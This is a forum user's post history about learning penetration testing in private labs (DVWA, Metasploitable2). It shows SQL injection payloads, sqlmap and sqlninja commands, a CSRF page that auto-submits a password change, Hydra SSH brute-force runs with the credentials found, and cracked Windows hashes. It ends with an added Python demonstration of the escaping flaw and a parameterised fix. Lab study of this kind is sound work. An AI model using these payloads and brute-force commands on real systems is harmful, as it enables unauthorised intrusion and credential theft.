pierre

Everything posted by pierre

  1. You were meaning: The escape string function is protecting the statement from exploitation; if the "escape string function" failed then the statement would no longer be protected. Imagine this over the whole of the internet. To which I answer: Yes, but "if the escape string statement failed" shouldn't be considered with such a function, no?
  2. Ok, I will maybe look for an MSSQL server to exploit :)
  3. Here is my sqlninja conf file for GET method:
     root@osboxes:~# more sql_get.conf
     --httprequest_start--
     GET http://192.168.1.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#';__SQL2INJECT__ HTTP/1.0
     Host: 192.168.1.1
     User-Agent: Mozilla/5.0 (X11; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
     Accept: text/xml, application/xml, text/html; q=0.9, text/plain; q=0.8, image/png,*/*
     Accept-Language: en-us, en; q=0.7, it;q=0.3
     Accept-Charset: ISO-8859-15, utf-8; q=0.7,*;q=0.7
     Content-Type: application/x-www-form-urlencoded
     Cookie: security=low; PHPSESSID=k4ooe285n9nco1a3kj01p0hv93
     Connection: close
     --httprequest_end--
     For this topology: [image not included]
     But yes I am on MySQL, maybe it is the problem..
  4. Yes, but "if it failed" shouldn't be considered with such a function, no? However, I am aware there are other hardening steps which can be implemented.
  5. Hmm, I don't understand your explanation..
  6. Hello, I would like to initiate myself to sqlninja: http://sqlninja.sourceforge.net/ I am already following this tutorial: http://techotweak.blogspot.fr/2015/05/what-is-sql-injection-and-how-to-use.html But my injection is located at this url: http://192.168.1.1/DVWA/vulnerabilities/sqli/? So I can't use the same file parameters... and it fails :(
     root@osboxes:~# sqlninja -mt -f sql_get.conf
     Sqlninja rel. 0.2.6-r1
     Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
     [+] Parsing sql_get.conf...
     [-] HTTP request not defined in sql_get.conf
     Are you sure you are not using a configuration file of a previous version? Starting from version 0.2.6, the syntax has changed. See documentation
     Has someone ever succeeded in using this tool? :)
  7. Yes so nearly impossible ;) Thanks again for your clear explanations digininja :)
  8. Yes, exactly!! I tried to escape something that I didn't have to; moreover, I didn't have to encode my SQLi.
     Low level:
     $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
     Medium level:
     $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
     So in the medium level, our value isn't surrounded by quotes, so we don't have to put any :) But if the medium level were:
     $id = mysql_real_escape_string( $id );
     $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
     It would have been impossible to make SQLi?
  9. Yes, but a client who has been redirected by a hacker webserver isn't supposed to use Burp. Ok, I'll change my hacker webserver DNS. :) EDIT: Header Referer at 192.168.1.1 or http://192.168.1.1 makes it work :)
  10. Yes, but if it is on level "Medium" on DVWA, it indicates that it might be bypassed? EDIT: I've succeeded in bypassing this evasion function but I don't know why... Here is the original SQLi I want to pass: 1' OR '1'='1 I encode the space and equal in hexadecimal but not the apostrophe, and it works (http://www.asciitable.com/): Encoded SQLi: 1%20OR%201%3D1 My question is the following: why does the SQLi work even if I don't have an apostrophe in it? Is it because equal and space aren't affected by mysql_real_escape_string()? Cf: http://php.net/manual/en/function.mysql-real-escape-string.php mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a.
  11. Hello, I was wondering if someone has ever bypassed this function mysql_real_escape_string "mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a." For example I want to input the classic: 1' or '1'='1 in a variable encapsulated by the mysql_real_escape_string function. Is it possible? EDIT: even SQLMAP doesn't make it!!
     root@osboxes:/var/www/html# sqlmap -u "http://192.168.1.1/DVWA/vulnerabilities/sqli/#" --cookie="security=medium; PHPSESSID=u669kpihv3tsblhrgqo21lcu71"
     [...]
     [11:06:43] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
     [11:06:43] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 222 times
     [*] shutting down at 11:06:43
  12. Simply by navigating on the website. But another interesting thing: from the W7 host, I run this html page with javascript included:
     <html>
     <head>
     <title>Yo</title>
     </head>
     <body bgcolor=white>
     <script>
     window.onload = function(){
       window.open("http://192.168.1.1/DVWA/vulnerabilities/csrf/test.php");
       window.open("http://192.168.1.1/DVWA/vulnerabilities/csrf/?password_new=test&password_conf=test&Change=Change");
     }
     </script>
     </body>
     </html>
     Test.php is a page to test/compare the HTTP_REFERER & SERVER_NAME global variables; it prints this:
     Hello you come from ! Hello you come from 192.168.1.1 ! Different IPs
     -> no HTTP_REFERER IP detected, blank
     That request didn't look correct.
     -> it means I can't change login/password; HTTP_REFERER restriction even if HTTP_REFERER is blank..
     Yes, the point here is to bypass the HTTP_REFERER restriction; on one client I can do BURP proxy :) But on a client who has been redirected to the website by another webserver, I don't know how to bypass the HTTP_REFERER header..
  13. 1) I go to the page directly -> HTTP_REFERER=BLANK
     2) I go from http://192.168.1.1/DVWA/index.php to http://192.168.1.1/DVWA/vulnerabilities/csrf/test.php -> HTTP_REFERER=BLANK
     3) I go from http://192.168.0.1/index.html to http://192.168.1.1/DVWA/vulnerabilities/csrf/test.php -> HTTP_REFERER=192.168.0.1
     So do you know why, in the 2nd situation, the HTTP_REFERER header is still blank?
  14. Yes, I test with this code:
     <html>
     <head>
     <title>PHP Test</title>
     </head>
     <body>
     <?php
     echo ('Hello you come from '.$_SERVER['HTTP_REFERER'].' ! ');
     echo ('Hello you come from '.$_SERVER['SERVER_NAME'].' ! ');
     if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) ) {
       echo("Same IPs");
     } else {
       echo("Different IPs");
     }
     ?>
     </body>
     </html>
     I just fucking don't know how to add a new line in PHP but it works, never mind :) Yes, but my HTTP_REFERER is either blank or the IP from my hacker webserver (Kali) when the W7 host clicks on my Kali webserver to be redirected to the Ubuntu webserver (CSRF): Cf: I'm well blocked by the protection:
     if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )
     I plan on how to inject HTTP_REFERER values in an HTTP request to bypass the boolean protection above!
  15. Yes, I've googled; is it a comparison function? Yes, it is the medium protection. Ah, because in my test either HTTP_REFERER is the pirate's web server IP or the field is blank... So HTTP_REFERER could be equal to SERVER_NAME?
  16. Hello, I'm understanding how CSRF works. On DVWA, at medium level, here is some of the correction provided:
     // Checks to see where the request came from
     if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )
     Do you know what the eregi() function is used for? I think SERVER_NAME is my server's @IP? But what is HTTP_REFERER?
  17. No, even for -t 16 I have:
     [DATA] max 16 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~0 tries per task
     But I got these shitty lines:
     The session file ./hydra.restore was written. Type "hydra -R" to resume session.
     The session file ./hydra.restore was written. Type "hydra -R" to resume session.
     The session file ./hydra.restore was written. Type "hydra -R" to resume session.
     So I think 6-8 is the right number of threads to execute Hydra.
  18. I listened to the prompt and changed my command:
     root@osboxes:~# hydra -L user.old -P pass.old 192.168.0.2 ssh -t 4
     Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
     Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-14 04:52:22
     [DATA] max 4 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~1 try per task
     [DATA] attacking service ssh on port 22
     [22][ssh] host: 192.168.0.2 login: klog password: 123456789
     [22][ssh] host: 192.168.0.2 login: msfadmin password: msfadmin
     [STATUS] 141.00 tries/min, 141 tries in 00:01h, 139 todo in 00:01h, 4 active
     [22][ssh] host: 192.168.0.2 login: service password: service
     [22][ssh] host: 192.168.0.2 login: sys password: batman
     [STATUS] 137.50 tries/min, 275 tries in 00:02h, 5 todo in 00:01h, 4 active
     1 of 1 target successfully completed, 4 valid passwords found
     Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-14 04:54:26
     This time all credentials were well found!! Adding the option -t 4 to my command :)
     -t TASKS run TASKS number of connects in parallel (default: 16)
     It has something to do with the parallel tasks in the processor? I've made some tests:
     A -t 6 makes the same good result within 1m24s.
     A -t 8 makes the same good result within 57s.
     A -t 10 makes the same good result within 50s.
     A -t 11 makes a wrong result within 54s, omitting 2/4 credentials.
     And at -t 11 I got the warning:
     [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
     [DATA] max 11 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~0 tries per task
     There is something scientific behind all this, I'm sure!
  19. Hello, I work with Hydra on metasploitable2. I have the metasploitable account credentials in two files, "user" and "pass". I just want to know which accounts have SSH rights configured, so I bruteforce. Three accounts have SSH access on the target:
     root@osboxes:~# ssh sys@192.168.0.2
     sys@192.168.0.2's password:
     sys@metasploitable:~$ exit
     logout
     root@osboxes:~# ssh msfadmin@192.168.0.2
     msfadmin@192.168.0.2's password:
     msfadmin@metasploitable:~$ exit
     logout
     root@osboxes:~# ssh service@192.168.0.2
     service@192.168.0.2's password:
     service@metasploitable:~$ exit
     logout
     Now I want to bruteforce with Hydra:
     root@osboxes:~# more user
     sys
     klog
     msfadmin
     service
     root@osboxes:~# more pass
     service
     msfadmin
     123456789
     batman
     And here is my Hydra command and the result:
     root@osboxes:~# hydra -L user -P pass 192.168.0.2 ssh
     Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
     Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-13 11:18:39
     [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
     [DATA] max 16 tasks per 1 server, overall 64 tasks, 16 login tries (l:4/p:4), ~0 tries per task
     [DATA] attacking service ssh on port 22
     [22][ssh] host: 192.168.0.2 login: service password: service
     [22][ssh] host: 192.168.0.2 login: msfadmin password: msfadmin
     [22][ssh] host: 192.168.0.2 login: klog password: 123456789
     1 of 1 target successfully completed, 3 valid passwords found
     Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-13 11:18:42
     Hydra is recovering the passwords well but not the right account.. It omits the account "sys:batman", do you know why?
  20. No, I was misunderstanding: I work on LM hashes and an LM hash is composed of 2 hashes, so I've got to put both to decrypt them :)
  21. I've succeeded in cracking this hash: e52cac67419a9a224a3b108f3fa6cb6d -> PASSWORD, so it may be the user's password. However, I don't succeed with this hash 8846f7eaee8fb117ad06bdd830b7586c.... so I don't know what it should be used for.. You think the 2nd is the salt? I don't suppose so because I am on a Windows XP system
  22. Hello, I've dumped hashes on my XP VM and here is the output:
     user:1004:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
     In Linux it is like in /etc/passwd with 7 fields:
     Username:Password:User ID:Group ID:User ID Info:Home directory:Command/shell
     Here we also have 7 fields, but it is like:
     Username:User ID:HASH:HASH:::
     Do you know what the two hashes are?
  23. Thank you I fully understand how it works now, the big difference between exploit & payload :)
  24. Ah ok, thanks, I didn't understand it in that way... Thank you very much
  25. So no exploits are needed, only a payload? The exploit is the human himself by launching the payload?
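The posts above about DVWA's "medium" level ask why `1 OR 1=1` still works when the value goes through mysql_real_escape_string(). The example below is added here; it is not code from any post in this thread nor from DVWA. It imitates the escaping rule quoted from the PHP manual (only the listed characters get a backslash) in plain Python, runs the "escaped but unquoted" query pattern against a constructed in-memory SQLite table whose rows are made up, and contrasts it with a hypothetical hardened version (`validate_user_id` / `hardened_query`, names my own) that checks the value is a decimal integer and binds it as a parameter. The point for a defender: escaping only neutralises quote-like characters, so it does nothing for a value that is interpolated outside quotes; type validation plus parameter binding is what closes the hole.

```python
import re
import sqlite3

# Character list quoted from the PHP manual in the posts above: \x00, \n, \r, \, ', " and \x1a.
# Assumption: no charset-specific handling, just the backslash prepending MySQL's C library does.
_ESCAPES = {
    "\x00": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
    "'": "\\'", '"': '\\"', "\x1a": "\\Z",
}


def mysql_real_escape_string(value: str) -> str:
    """Pure-Python imitation of mysql_real_escape_string (not the real library call)."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def make_db() -> sqlite3.Connection:
    """Constructed sample table shaped like the DVWA users table; the rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "gordonb", "Brown"), (3, "pablo", "Picasso")],
    )
    return conn


def medium_query(conn: sqlite3.Connection, id_value: str):
    """The 'medium' pattern from the posts: escaped, then interpolated WITHOUT surrounding quotes."""
    escaped = mysql_real_escape_string(id_value)
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = {escaped};"
    return conn.execute(sql).fetchall()


def validate_user_id(id_value: str) -> bool:
    """Hypothetical allow-list check: the parameter must be a short decimal integer."""
    return re.fullmatch(r"[0-9]{1,10}", id_value) is not None


def hardened_query(conn: sqlite3.Connection, id_value: str):
    """Hypothetical fix: validate the type up front, then bind the value as a query parameter."""
    if not validate_user_id(id_value):
        raise ValueError("user_id must be a decimal integer")
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (int(id_value),)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "1 OR 1=1"  # the unquoted payload from the posts above
    print(repr(mysql_real_escape_string(payload)))  # unchanged: nothing in it is escapable
    print(medium_query(db, "2"))                    # one row, as intended
    print(medium_query(db, payload))                # every row: escaping did not help
    try:
        hardened_query(db, payload)
    except ValueError as err:
        print("rejected:", err)                     # the hardened version refuses the value
```

Running it shows the escaped payload is byte-for-byte identical to the input, so the medium query returns all three rows, while the hardened query rejects it before any SQL is built. The same reasoning explains the sqlmap and manual results in the posts: with the quoted "low" pattern, the apostrophe is what the escaping defeats; with the unquoted "medium" pattern, there is no apostrophe to defeat.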